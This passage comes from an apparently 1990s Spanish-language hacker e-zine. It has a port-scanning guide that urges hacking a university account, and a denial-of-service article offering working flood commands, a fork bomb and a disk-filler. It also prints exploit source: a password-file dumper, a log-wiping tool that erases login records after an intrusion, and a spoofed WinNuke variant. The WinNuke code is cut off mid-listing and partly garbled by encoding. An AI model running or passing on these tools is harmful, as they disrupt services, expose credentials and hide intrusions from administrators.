 por su numero que los identifica y define sus funciones.

 El "surfeo de puertos" es cuando se estudian todos los puertos de un Host
 buscando una forma de entrar al sistema. El surfeo de puertos se aprovecha
 de la estructura del protocolo TCP/IP. El protocolo TCP/IP como ya se ha
 dicho muchas veces es el conjunto de reglas que usan las computadoras
 conectadas a internet para poder compartir datos. Una de las funciones mas
 basicas de UNIX es asignar un puerto a cada funcion que una computadora
 quiera que otra haga. Los ejemplos mas comunes podrian ser el puerto para
 mandar email (25), Telnet(23), ftp(21) y http(80).

 Cuando el browser quiere leer una pagina web contacta al Host usando el
 puerto numero 80 y le dice a la computadora que maneja ese sitio web que
 te deje entrar. Y seguramente, te dejaran entrar y leer la pagina sin la
 necesidad de un login o password.

 La mayoria de las computadoras en internet te permitiran usarlas sin la
 necesidad de un password. Esto es gracias a los standards de internet.

 A pesar de que ningun manual de unix te enseara como hacer el surfeo de
 puertos esto es basico para lograr entrar en un sistema si no tenemos
 ninguna otra forma de hacerlo (logins defaults, bugs). El surfeo de puertos
 es necesario para localizar debilidades en un sistema y explotarlas, si
 queremos evitarnos trabajo podemos usar un programa como Satan o Netcat.
 Estos programas que puedes ejecutar desde Linux, FreeBSD o cualquier tipo
 de UNIX desde la PC y avisaran que puertos de un host estan en uso y checaran
 cada uno en busca de fallas y avisaran cuales son. Obviamente las primeras
 personas que usan estos programas son los administradores de sistemas por
 lo que se recomienda hacer esto manualmente conociendo los errores mas
 nuevos de sendmail, daemon  o http.

 Si quieres empezar en el surfeo de puertos con el pie derecho es necesario
 una cuenta de tu ISP que te permita usar Unix, como esto es hoy en dia
 muy dificil de conseguir lo mas sencillo que puedes hacer es hackear una
 cuenta de alguna universidad o preparatoria donde permitan compilar y usar
 todos los comandos Unix. Otra forma de obtener una cuenta SHELL es pagando a
 tu universidad o centro de estudios local por una cuenta si no puedes accesar
 a esta cuenta via dial-up (numero telefonico) con un programa de
 comunicaciones entonces tendras que usar tu conexion PPP con un programa
 Telnet, de ahi usa telnet para conectarte a la universidad y listo. Estaras
 dentro una cuenta shell.

 Si quieres conocer y examinar un dominio y ver que computadoras lo usan
 para entrar a internet usamos el comando whois. El siguiente ejemplo es
 el original de este archivo y en seguida mostrare algunos otros.

 # whois nmia.com

 Este comando nos mostrara las computadoras conectadas a este dominio y alguna
 otra informacion. 
 
 # telnet nmia.com 15

 Ahora usamos telnet en el puerto numero 15 que permite ver las estadisticas
 de la red -netstat- bajo daemon y mostrara todas las computadoras conectadas
 a internet a traves de esta computadora.

 Tambien puedes intentar haciendo telnet al puerto de finger (79) para ver
 que sucede. Comunmente la conexion sera negada ya que la mayoria de los
 sysadmins no permiten el uso de finger por que muestra mucha informacion
 sobre los usuarios del sistema. De cualquier forma si logras entrar a un
 sistema que tenga en funcionamiento finger puedes preguntar por una direccion
 email y te dira el nombre y alguna otra informacion sobre el usuario que te
 ayudara a hackear el password :)

 Lo primero es usar whois para conseguir las computadoras conectadas a un
 dominio, ya que se consigan las direcciones se pueden surfear los puertos
 para buscar alguna falla. Una amigo de RareGaZz, GuyBrush nos ha enviado
 los resultados de un surfeo a ns.psi.net (192.33.4.10).

        Puertos abiertos
        
        daytime(13)
        discard(9)
        domain(53)
        exec(512)
        ftp(21)
        login(513)
        shell(514)
        sunrpc(111)
        telnet(23)
        time(37)
        uucp(540)

 Nuestro amigo ha intentado hacer una conexion via telnet a este sistema pero
 al igual que la mayoria de los sistemas protegidos nego la conexion desde
 su direccion IP. ( sera este un caso para DNS spoofing?? ).
 Para encontrar las computadoras conectadas a cierto dominio puedes hacerlo
 en whois.internic.net igual que como lo ha hecho GuyBrush. En esta direccion
 podras entrar a la base de datos de internet, tambien podras verificar
 direcciones I.P. entre otras cosillas.

 Si te conectas a un sistema importante y comienzas a surfear puertos debes
 recordar que la mayoria de los daemons que operan esos puertos guardan un
 log de los comandos usados.

 Bueno si quieres surfear esto es lo basico:

 1) Obten una forma de usar los comandos de UNIX (cuenta shell). Como he
    dicho, hay distintas formas y la mas recomendable es tener Linux en tu
    PC y conectarla a tu ISP. Esto es complicado, si no tienes idea de como
    hacerlo ... mejor consiguete a alguien que pueda ayudarte. Yo en lo
    particular particione mi disco en dos, uno para Windows 95 (Hey nadie es
    perfecto!) y en la otra Linux. Antes de entrar se me ofrece la opcion
    de usar Windows o Linux. Hacer esto me costo alrededor de $50 dolares
    por que el programa para particionar el disco y permitir empezar una
    sesion con uno de los dos sistemas cuesta, ademas el cd de linux mas algo
    de documentacion tambien cuesta :(

 2) Usa el comando "telnet <host> <numero de puerto>" donde <host> es la
    direccion internet de la computadora que tratas de visitar y el numero
    de puerto es cualquier cosa que se vea divertido.


Numero de Puerto       Servicio        Lo que hacen

   7                  echo         Cualquier cosa que mandes sera regresado.
   9                  discard      Dev/null -- Basura, lo no deseado en el sys
   11                 systat       Mucha informacion sobre los usuarios
   13                              La hora y fecha de la computadora host
   15                 netstat      Mucha informacion sobre la red
   19                 chargen      CTRL + C detiene todo lo que vomita
   21                 ftp          Duh?
   23                 telnet       Duh?
   25                 smpt         Para crear email.
   37                 time         La hora.
   39                 rlp          Resource location
   43                 whois        Informacion sobre la red y usuarios
   70                 gopher       Buscador de informacion caducado
   79                 finger       Mucha informacion sobre los usuarios
   80                 http         Servidor Web
   110                pop          Email que llega
   119                nntp         Grupos de noticias Usenet
   443                shttp        Otro servidor web
   513                rlogin       Remote login
   514                shell        Comando remoto, sin password!

 ||||||||||||||||
 ||serverhacker||
 ||||||||||||||||

[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+][+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]
     5 minutos para soltar los toros [...]  Comienza la pamplonada !! 
[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+][+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]

                       DENIAL OF SERVICE -Introduccion-
                         -=La biblia del terrorista=-
                                  por: Swoish

 Los ataques conocidos como `denial of service' son en internet lo "in" o
 "de moda" por la facilidad con que pueden hacerse. Lo unico dificil o
 complicado es conseguir un servidor desde donde lanzar el ataque.
 Debido a la anatomia de Internet es muy dificil localizar al atacante ya
 que antes de llegar al objetivo una seal pasa por distintos servidores que
 deben ser examinados uno por uno antes de llegar al servidor hostil.

 El ataque consiste en descomponer servicios de un host sin permiso como
 ejemplo estrellar un sistema. Protegerse de este tipo de ataques es muy
 dificil debido a que el sistema UNIX asume que todo funciona correctamente
 mientras el ataque esta en progreso.

 Las razones por las que cualquier persona pueda estrellar un sistema son
 muchas y las mas probables son:
 -Debido al status subcultural de la persona.
 -Ganar acceso.
 -Venganza.
 -Razones politicas.
 -Razones economicas.
 -Por que si.

 Es facil ganar acceso a un sistema usando el ataque denial of service ya
 que es un gatillo que dispara otro tipos de `agujeros' en un sistema. Comunes
 ejemplos pueden ser las versiones antiguas de X-lock que permitian el acceso
 al sistema una vez este ha sido estrellado. Para corregir el error es
 necesario el acceso fisico al servidor.
 El inundado del Syn o Syn flooding puede ser tan solo una parte de un ataque
 del tipo IP-spoof.
 Tambien algunos programas tienen `agujeros' bajo su startup que pueden ser
 usados para ganar status root. Por ejemplo SSH (secure shell).
 Bajo un ataque se puede restringir el acceso a ciertas personas al servidor
 por lo tanto evitar que realizen su trabajo.

 EXISTEN ALGUNOS SISTEMAS OPERATIVOS MAS SEGUROS?
 ================================================

 Esta es una pregunta dificil de contestar y creo que todo depende del
 administrador de un sistema UNIX.

 Una comparacion con Windows 95 o NT puede ser interesante debido a la gran
 cantidad de errores que han sido encontrados en ambos sistemas.
 Los sistema UNIX son mucho mas complejos y tienen cientos de programas
 adheridos que proporcionan diferentes servicios lo que engrandece el margen
 al error desde adentro.

 Usando Windows 95 o NT uno se arriesga a distintos metodos de estrellar la
 maquina que probablemente funcionarian aunque existen algunos que siempre
 funcionan.

 En realidad no existe gran diferencia entre Microsoft y UNIX excepto que en
 uno de los sistemas se necesita mas preparacion [ adivinen cual? ] que en
 el otro. Existen dos puntos importantes que deben considerarse:

        - Unix tiene mas herramientas de diagnostico para descubrir un ataque
        y monitorear a los usuarios que cualquier otro sistema. Ver que es lo
        que trama un usuario bajo Windows es muy dificil.

        - El promedio de los administradores Unix tiene mas experiencia que
        un tipico administrador de una red microsoft.

 Estos dos ultimos puntos le dan ventaja a Unix contra los ataques de negacion
 del servicio o denial of service.

 Una comparacion de Microsoft y Unix concerniendo ataques externos es mucho
 mas dificil. De cualquier forma es una hecho que las redes Microsoft son
 mas seguras que las redes Unix debido a que ofrecen menos servicios que un
 sistema Unix standard.

 OBJETIVOS BASICOS DE UN ATAQUE
 ==============================

 1.Espacio swap
 ~~~~~~~~~~~~~~
 La mayoria de los sistemas tienen cientos de megabytes reservados al espacio
 swap para resolver las peticiones del cliente. El espacio swap es tipicamente
 usado para forjar procesos menores que tienen un periodo de vida corto. Asi
 pues el espacio swap bajo ninguna causa debera ser usado rigurosamente. Una
 negacion de servicio podria estar basada en un metodo que trate de llenar el
 espacio swap.

 2.Tablas del Kernel
 ~~~~~~~~~~~~~~~~~~~
 Es trivial sobrecargar las tablas del kernel para ocasionar serios problemas
 al sistema. Los sistemas que escriben a traves de caches y buffers pequeos
 son especialmente sensitivos.

 Otro objetivo susceptible es el kernel memory allocation. Todo Kernel o
 cerebro tiene un limite para la memoria en su mapa de memoria, si el sistema
 alcanza este limite el cerebro no puede colocar mas memoria y el sistema debe
 ser reboteado. La memorial del kernel no solo es usada para procesos del
 CPU, monitores y asi, pero tambien para procesos ordinarios lo que significa
 que cualquier sistema puede ser estrellado con un buen algoritmo lo bastante
 rapido. [ trucos disponibles en numeros anteriores de la revista :) ]

 3. RAM
 ~~~~~~
 Una negacion del servicio que ocupe grandes cantidades de RAM puede ocasionar
 bastantes problemas. NFS y servidores de correo con extremadamente sensitivos
 porque casi nunca ocupan mucho RAM por lo tanto tienen poco RAM asignado. Un
 ataque a un servidor NFS es comun. El cliente de NFS normal puede hacer mucho
 uso del cache, pero un cliente NFS puede ser cualquier programa inclusive uno
 que hayas escrito tu mismo...

 4. Discos
 ~~~~~~~~~
 Un ataque clasico es llenar el disco duro.


 ATACANDO DESDE FUERA
 ====================

 Usando finger
 ~~~~~~~~~~~~~
 La mayoria de las instalaciones de fingerd dejan redireccionar a otro host.
 Ejemplo:

        $finger @sistema.dos.com@sistema.uno.com

 Finger en el ejemplo tendra que ir a traves del sistema.uno.com y despues al
 sistema.dos.com. Todo lo que el sistema.dos.com sabe es que el
 sistema.uno.com esta contactandole usando finger. Este metodo puede ser usado
 para esconderte, pero tambien para hacer uso de un truco sucio. Ejemplo:

        $ finger @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@host.que.atacamos.com

 Todos esos signos @ ocasionaran que finger llame a host.que.atacamos.com una
 y otra vez... El efecto es desastroso para host.que.atacamos.com resultando
 en un uso alto del ancho de banda, falta de memoria y un disco duro con menos
 espacio debido a todos los procesos creados.

 La solucion es instalar un fingerd que no soporte redirecciones, por ejemplo
 el finger GNU. Tambien puedes desinstalar el servicio finger.

 Usando telnet
 ~~~~~~~~~~~~~
 Examina este script:

 while : ; do
        telnet sistema.que.atacamos.com &
 done

 Un ataque de este tipo comera algo del ancho de banda pero no es nada
 comparado con el metodo fingerd. El punto es que algunas firewalls y httpd:s
 piensan que el ataque es una loop y se apagan automaticamente hasta que el
 administrador mate el proceso con kill -HUP

 Broadcast Storms
 ~~~~~~~~~~~~~~~~
 Este es un metodo muy popular en la redes donde todos los hosts actuan como
 gateways.
 Existen muchas versiones del ataque pero el metodo basico es mandar muchos
 paquetes a todos los hosts de la red con una direccion destino inexistente.
 Cada host tratara de mandar los paquetes asi que estos `rebotaran' por la red
 un buen rato.

 Los servicios que pueden ser abusados para hacer esto son ping, finger y
 sendmail.

 Email Bombing
 ~~~~~~~~~~~~~
 En un ataque de email se envian muchos mensajes identicos a una o muchas
 direcciones del host. El efecto en el objetivo es un alto uso del ancho
 de banda y menos espacio en disco... Cuando envias muchos mensajes a una
 direccion inexistente del host desde otra inexistente un mensaje se
 convertira en 3 y regresara para convertirse en 3 de nuevo y asi... Por
 mas odioso que se vea este ataque es bastante efectivo y aun no es ilegal
 en muchos paises latinoamericanos y europeos.

 Ejemplo:
 Envia un mail de 100k a noexiste@host.atacado.com desde una direccion que
 no exista como noexiste@esta.direccion.duh
 Cuando el mensaje llege a host.atacado.com como no existe la direccion
 noexiste regresara el mensaje a noexiste@esta.direccion.duh y como esta
 direccion tampoco existe ... regresara ahora como un mensaje de 300k y asi...

 Otra forma de abusar el email y servidores norteamericanos es juntar varios
 remailers. Por ejemplo:
 Suponiendo que tenemos nosotros una cuenta en Geocities. Digamos
 uno@geocities.com y le decimos que queremos que el mail que llegue a esa
 direccion lo mande a dos@bigfoot.com. Ahora en la cuenta dos@bigfoot.com
 le decimos que lo mande a tres@iname.com. Y en la cuenta tres@iname.com le
 decimos que lo mande a uno@geocities.com ... Despues mandamos un mega o dos
 a uno@geocities.com que lo mandara a dos@bigfoot.com y de ahi a
 tres@iname.com y de nuevo a uno@geocities.com ... este ataque es lame si
 en vez de un mega mandas unos 5 !! En fin, espera represalias si te animas
 a hacerlo.


 Abuso del FTP anonimo
 ~~~~~~~~~~~~~~~~~~~~~
 Si un servidor FTP anonimo tiene un area que pueda ser escrita puede ser
 abusada para un ataque de negacion del servicio. Obviamente el objeto seria
 llenar el disco duro.

 SYN FLOODING
 ~~~~~~~~~~~~
 El mas famoso de los ataques del tipo denial of service. Phrack y 2600 han
 publicado extensos articulos sobre este ataque y codigo para hacerlo.

 El ataque se basa en un saludo entre dos hosts incompleto. El host hostil
 envia un paquete SYN pero no responde al paquete ACK ocasionando que el
 stack TCP/IP espere cierta cantidad de tiempo a que el host hostil responda
 antes de cerrar la conexion. Si creamos muchas peticiones de conexion y
 no se responde a ninguna el host estara inactivo mucho tiempo esperando
 respuesta ocasionando lentitud en los demas servicios.

 Ping Flooding
 ~~~~~~~~~~~~~
 Este metodo tiene un gran efecto en el sistema atacado.

 Bajo Unix nosotros podriamos intentar algo como: ping -s host
 para mandar paquetes de 64 bytes.

 Si tienes Windows 95, has click en start, elige run y escribe:
 PING -T -L 256 host.que.atacamos.com y comienza 15 sesiones iguales.


 Crashing usando Ping
 ~~~~~~~~~~~~~~~~~~~~
 Para detener a un sistema desde una maquina corriendo Windows 95 simplemente
 ejecuta:

 ping -l 65510 host.que.atacamos.com

 Y el sistema se detendra o se re-iniciara.


 ATACANDO DESDE DENTRO
 =====================

 Llenando el disco duro
 ~~~~~~~~~~~~~~~~~~~~~~~

 Si en tu sistema puedes usar el directorio temporal /tmp - /temp /pub/tmp -
 pub/temp - pub/incoming o /incoming entonces es posible que llenes el disco
 usando un script parecido a este:

 while : ;
 mkdir .xxx
 cd .xxx
 done


 Uso malicioso de fork()
 ~~~~~~~~~~~~~~~~~~~~~~~
 Si alguien ejecuta este programa C++ el resultado sera un crash en la mayoria
 de los sistemas.

#include <sys/types.h>
#include <unistd.h>
#include <iostream.h>

main()
{
        int x;
        while(x=0;x<1000000;x++)
                {
                        system("uptime");
                        fork();
                }
}


 Para generar un ataque mas sangriento puedes cambiar el comando uptime por
 sync.

 Crear archivos dificiles de remover
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 Todos los archivos pueden ser borrados pero aqui hay algunos dificiles:
 ( $ simboliza el prompt, ^C es igual a CTRL + C. )

 1.-
 $ cat > -xxx
 ^C
 $ ls
 -xxx
 $ rm -xxx
 rm: illegal option -- x
 rm: illegal option -- x
 rm: illegal option -- x
 usage: rm [-fiRr] file ...
 $

 2.-
 $ touch xxx!
 $ rm xxx!
 rm: remove xxx! (yes/no)? y
 $ touch xxxxxxxxx!
 $ rm xxxxxxxxx!
 bash: !": event not found
 $


 Ataque CSH
 ~~~~~~~~~~
 Ejecuta esto bajo /bin/csh despues de modificarlo con el path propio del
 shell csh de tu sistema. Busca este path en tu archivo .login

 |I /bin/csh
 nodename : **************b


 DUMPING CORE
 ============

 Uso malicioso de Netscape
 ~~~~~~~~~~~~~~~~~~~~~~~~~
 Bajo Netscape 1.1N este link resultara en un fault de segmentacion y el
 sistema arrojara el core.

 <a name="http://xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.
 xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxxxxx.xxx.xxx.
 xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxxxxx.xxx.xxx.xxx.xxx.xxx.
 xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxxxxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.
 xxx.xxx.xxx.xxx.xxxxxx.xxx.xxx.xxx.xxx.xxx...>

 Swoish@rdk.org

[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+][+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]
             Ser o no ser? Leyendo raregazz - hasta el amanecer 
[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+][+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]

                               $$$$$                $$
      "$$$$$$$$$$$$$$$"           $$       ooo    $$$$$ooo         oooo
        "$$$$$$$$$$"             "$$"   o$$   $$o "$$$$$$$$$ $$$$$$$$$$
 $$       "$$$$$$"       $$       $$oo $$$$$$$$$$o  """          o$$$"
 $$$o      "$$$$"       $$$      o$$"  $$$"""$$""   $$$         oooo
 $$$$oo     $$$$      $$$$$   ooo$$$ooo $$$oooo$$$ o$$$ooooooo$$$$$$$$$
 $$$$$$$ooo  $$  ooo$$$$$$$    """"""""   """"""    """""""" """"""""""
 $$$$$$$$$$$$$$$$$$$$$$$$$$  oooo                                ooo
 $$$$$$$"""  $$o """$$$$$$$  ""$$                                $$$$
 $$$$""     $$$o     ""$$$$    $$$oooo      $$$$$$$o     oooooo   $$$ oooooo
 $$$"      o$$$$o      "$$$   "$$$$""$$o       "$$$$   o$$""$$$$  $$" $$$"""
 $$       o$$$$$$$       $$    $$$$  $$$ "$$$$""$$$$  $$$     ""  $$$$$$ ""
        o$$$$$$$$$$o           $$$   $$o  $$$o o$$$$o $$$         $$"" $$o
     o$$$$$$$$$$$$$$$$o       o$$$$$ $$$$$  """" """""" "$$$$$$$" $$$$  $$$$$o

 /\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\

  Exploit.- un exploit es un programa que abusa de algun error de un sistema
            operativo para conseguir aumentar los privilegios de un usuario
            o la caida del sistema.

 Estamos de vuelta por demanda popular y esta vez no molestaremos a los SysOps
 de bancos, servicios de comunicaciones ;) o cualquier otra Cia. Como unos
 saben algunas compaias se quejaron con raretrip por haber sacado en este
 zine los numeros de sus sistemas aqui en mexico por eso el nio quiso esperar
 que las cosas se enfriaran y nos quito esta pequeisima parte del zine que
 nosotros estabamos haciendo puntualmente. El caso es que ustedes han estado
 solicitando mucho codigo fuente y nosotros tenemos los materiales necesarios
 para satisfacer sus necesidades de hacker's.

 .:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:..:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.

 Este codigo imprimira el archivo /etc/shadow en la mayoria de los sistemas
 SunOs 5.x Es necesario definir algunas constantes debido a las diferencias
 entre los sistemas y tambien por q' algunos operadores cambian los defaults
 para "proteger" su trabajo.

/*  This source will/should print out SHADOWPW passwd files.   */



struct  SHADOWPW {                              /* see getpwent(3) */

         char *pw_name;

         char *pw_passwd;

         int  pw_uid;

         int  pw_gid;

         int  pw_quota;

         char *pw_comment;

         char *pw_gecos;

         char *pw_dir;

         char *pw_shell;

};

struct passwd *getpwent(), *getpwuid(), *getpwnam();



#ifdef   elxsis?



/* Name of the shadow password file. Contains password and aging info */



#define  SHADOWPW "/etc/shadowpw"

#define  SHADOWPW_PAG "/etc/shadowpw.pag"

#define  SHADOWPW_DIR "/etc/shadowpw.dir"

/*

 *  Shadow password file pwd->pw_gecos field contains:

 *

 *  <type>,<period>,<last_time>,<old_time>,<old_password>

 *

 *  <type>      = Type of password criteria to enforce (type int).

 *             BSD_CRIT (0), normal BSD.

 *             STR_CRIT (1), strong passwords.

 *  <period>  = Password aging period (type long).

 *             0, no aging.

 *             else, number of seconds in aging period.

 *  <last_time>         = Time (seconds from epoch) of the last password

 *             change (type long).

 *             0, never changed.n

 *  <old_time>  = Time (seconds from epoch) that the current password

 *             was made the <old_password> (type long).

 *             0, never changed.ewromsinm

 *  <old_password> = Password (encrypted) saved for an aging <period> to

 *             prevent reuse during that period (type char [20]).

 *             "*******", no <old_password>.

 */



/* number of tries to change an aged password */



#define  CHANGE_TRIES 3



/* program to execute to change passwords */



#define  PASSWD_PROG "/bin/passwd"



/* Name of the password aging exempt user names and max number of entires */



#define  EXEMPTPW "/etc/exemptpw"

#define MAX_EXEMPT 100



/* Password criteria to enforce */



#define BSD_CRIT 0     /* Normal BSD password criteria */

#define STR_CRIT 1      /* Strong password criteria */

#define MAX_CRIT 1

#endif   elxsi

#define NULL 0

main()

{

       struct passwd *p;

       int i;

       for (;1;) {;

         p=getpwent();

         if (p==NULL) return;

         printpw(p);

       }

}



printpw(a)

struct SHADOWPW *a;

{

       printf("%s:%s:%d:%d:%s:%s:%s\n",

          a->pw_name,a->pw_passwd,a->pw_uid,a->pw_gid,

          a->pw_gecos,a->pw_dir,a->pw_shell);

}



/* SunOS 5.0           /etc/shadow */

/* SunOS4.1+c2     /etc/security/passwd.adjunct */




 .:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:..:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.

 Este es un exploit para limpiar los archivos que guardan importantes logs
 de una entrada ilegitima. Tambien es necesario verificar que los archivos
 se localicen donde el codigo lo defina o modificarlo antes de compilar.

#include <sys/types.h>

#include <stdio.h>

#include <unistd.h>

#include <sys/file.h>

#include <fcntl.h>

#include <utmp.h>

#include <pwd.h>

#include <lastlog.h>

#define WTMP_NAME "/usr/adm/wtmp"

#define UTMP_NAME "/etc/utmp"

#define LASTLOG_NAME "/usr/adm/lastlog"

 

int f;

 

void kill_utmp(who)

char *who;

{

    struct utmp utmp_ent;

 

  if ((f=open(UTMP_NAME,O_RDWR))>=0) {

     while(read (f, &utmp_ent, sizeof (utmp_ent))> 0 )

       if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {

                 bzero((char *)&utmp_ent,sizeof( utmp_ent ));

                 lseek (f, -(sizeof (utmp_ent)), SEEK_CUR);

                 write (f, &utmp_ent, sizeof (utmp_ent));

            }

     close(f);

  }

}

 

void kill_wtmp(who)

char *who;

{

    struct utmp utmp_ent;

    long pos;

 

    pos = 1L;

    if ((f=open(WTMP_NAME,O_RDWR))>=0) {

 

     while(pos != -1L) {

        lseek(f,-(long)( (sizeof(struct utmp)) * pos),L_XTND);

        if (read (f, &utmp_ent, sizeof (struct utmp))<0) {

          pos = -1L;

        } else {

          if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {

               bzero((char *)&utmp_ent,sizeof(struct utmp ));

               lseek(f,-( (sizeof(struct utmp)) * pos),L_XTND);

               write (f, &utmp_ent, sizeof (utmp_ent));

               pos = -1L;

          } else pos += 1L;

        }

     }

     close(f);

  }

}

 

void kill_lastlog(who)

char *who;

{

    struct passwd *pwd;

    struct lastlog newll;

 

     if ((pwd=getpwnam(who))!=NULL) {

 

        if ((f=open(LASTLOG_NAME, O_RDWR)) >= 0) {

            lseek(f, (long)pwd->pw_uid * sizeof (struct lastlog), 0);

            bzero((char *)&newll,sizeof( newll ));

            write(f, (char *)&newll, sizeof( newll ));

            close(f);

        }

 

    } else printf("%s: ?\n",who);

}

 

main(argc,argv)

int argc;

char *argv[];

{

    if (argc==2) {

        kill_lastlog(argv[1]);

        kill_wtmp(argv[1]);

        kill_utmp(argv[1]);

        printf("Zap2!\n");

    } else

    printf("Now...that was as bad as shit!\n");

}


 .:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:..:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.

 Una version mejorada de WinNuke(c) por HeTak. La diferencia de este codigo
 es la adaptacion de un IP Spoofer para que la persona bombardeada no sepa
 de donde provienen las bombas. Lamerz Note: Bombardea solo redes Windows.

/* ************************************************************ */=0A=

/* WinBomber 0.9 by HeTak       05.10.97                        */=0A=

/*                                                              */=0A=

/* This simply demonstrates shitty Win networking by            */=0A=

/* sending Out of Bound Message flag in Ba ACK packet.          */=0A=

/* The difference between winnuke.c is that WinBomber           */=0A=

/* spoofs source ip (you) for extra security so the person      */=0A=

/* who will get nuked will not know who sent the nuke.          */=0A=

/* FOR EDUCATIONAL PURPOSES ONLY.                               */=0A=

/* Sometimes I'm on irc, find me there for any questions.       */=0A=

/*                                                              */=0A=

/* ************************************************************ */=0A=

=0A=

=0A=

=0A=

=0A=

#include <unistd.h>=0A=

=0A=

#include <netinet/in.h>=0A=

#include <netinet/in_systm.h>=0A=

#include <netinet/ip.h>=0A=

#include <netinet/tcp.h>=0A=

#include <netinet/protocols.h>=0A=

#include <arpa/inet.h>=0A=

#include <string.h>=0A=

#include <sys/types.h>=0A=

#include <sys/socket.h>=0A=

#include <stdio.h>=0A=

#include <netinet/in.h>=0A=

#include <netdb.h>=0A=

#include <errno.h>=0A=

=0A=

#define PACKET_SIZE     sizeof(struct tcppkt)=0A=

#define DEF_BADDR       "132.45.6.8"=0A=

=0A=

struct tcppkt {=0A=

        struct iphdr    ip;=0A=

        struct tcphdr   tcp;=0A=

};=0A=

=0A=

=0A=

=0A=

unsigned short in_chksum(addr, len)=0A=

        u_short *addr;=0A=

        int len;=0A=

{=0A=

        register int nleft =3D len;=0A=

        register u_short *w =3D addr;=0A=

        register int sum =3D0;=0A=

        u_short answer =3D0;=0A=

        =0A=

        while(nleft > 1)        {=0A=

                sum+=3D *w++;=0A=

                nleft -=3D 2;=0A=

                }=0A=

                =0A=

        if (nleft =3D=3D 1) {=0A=

         *(u_char *) (&answer) =3D *(u_char *) w;=0A=

         sum+=3Danswer;=0A=

         }=0A=

         =0A=

         sum =3D (sum >> 16) + ( sum & 0xffff);=0A=

         sum +=3D (sum >> 16);=0A=

         answer =3D ~sum;=0A=

         return (answer);=0A=

}=0A=

=0A=

=0A=

=0A=

/* =

********************************************************************** =

*/=0A=

=0A=

int bombaway(sin, fakesock, saddr)=0A=

        struct sockaddr_in *sin;=0A=

        u_long saddr;=0A=

        int fakesock;=0A=

{=0A=

        register struct iphdr *ip;=0A=

        register struct tcphdr *tcp;=0A=

        register char *php;=0A=

        static char packet[PACKET_SIZE];=0A=

        static char phead[PACKET_SIZE+12];=0A=

        u_short len =3D0;=0A=

        u_short sport =3D 5150;=0A=

        =0A=

        ip =3D (struct iphdr *) packet;=0A=

        =0A=

        ip->ihl         =3D 5;=0A=

        ip->version     =3D 4;=0A=

        ip->tos         =3D 0;=0A=

        ip->tot_len     =3D htons(PACKET_SIZE);=0A=

        ip->id          =3D htons(918 + (rand()%32768));=0A=

        ip->frag_off    =3D 0;=0A=

        ip->ttl         =3D 255;=0A=

        ip->protocol    =3D IPPROTO_TCP;=0A=

        ip->check       =3D 0;=0A=

        ip->saddr       =3D saddr;=0A=

        ip->daddr       =3D sin->sin_addr.s_addr; =0A=

=0A=

        tcp =3D (struct tcphdr *)(packet + sizeof(struct iphdr));=0A=

        tcp->th_sport   =3D htons(sport++);=0A=

        tcp->th_dport   =3D htons(sin->sin_port);=0A=

        tcp->th_seq     =3D htonl(31337);=0A=

        tcp->th_ack     =3D 0;  =0A=

        tcp->th_x2      =3D 0;=0A=

        tcp->th_off     =3D 5;=0A=

        tcp->th_flags   =3D TH_ACK;     /* Maybe could use some other flag

*/=0A=

        tcp->th_win     =3D htons(10052); =0A=

        tcp->th_sum     =3D 0;          =0A=

        tcp->th_urp     =3D 0;          =0A=

        php =3D phead;=0A=

        memset(php, 0, PACKET_SIZE + 12);=0A=

        memcpy(php, &(ip->saddr), 8);=0A=

        php +=3D 9;=0A=

        memcpy(php, &(ip->protocol), 1);=0A=

        len =3D htons(sizeof(struct tcphdr));=0A=

        memcpy(++php, &(len), 2);=0A=

        php +=3D 2;=0A=

        memcpy(php, tcp, sizeof(struct tcphdr));=0A=

        =0A=

        tcp->th_sum =3D in_chksum(php, sizeof(struct tcphdr)+12);=0A=

        =0A=

        =0A=

        return (sendto(fakesock, packet, PACKET_SIZE, MSG_OOB, (struct =

sockaddr *) sin,=0A=

                        sizeof(struct sockaddr_in)));=0A=

}=0A=

=0A=

/* =

*********************************************************************** =

*/=0A=

=0A=

=0A=

=0A=

=0A=

u_long=0A=

resolve(host)=0A=

char *host;=0A=

{=0A=

        struct hostent *he;=0A=

        u_long addr;=0A=

        if ((he =3D gethostbyname(host)) =3D=3D NULL) {=0A=

                addr =3D inet_addr(host);=0A=

                }=0A=

        else {=0A=

                bcopy(*(he->h_addr_list), &(addr),

sizeof(he->h_addr_list));=0A=

                }=0A=

        return (addr);=0A=

}=0A=

=0A=

=0A=

main(argc, argv)=0A=

=0A=

int argc;=0A=

char **argv;=0A=

{=0A=

=0A=

        int mainsock, fakesock, bombs;=0A=

        u_short dport;=0A=

        u_long saddr, daddr;=0A=

        struct sockaddr_in sin;=0A=

        struct hostent *host;=0A=

        bombs =3D saddr =3D 0;=0A=

=0A=

=0A=

/* =

************************************************************************=

**************** */=0A=

=0A=

=0A=

if (argc<3)=0A=

        {=0A=

        printf("Usage: %s <source> <destination> \n", argv[0]);=0A=

        exit();=0A=

        }=0A=

=0A=

=0A=

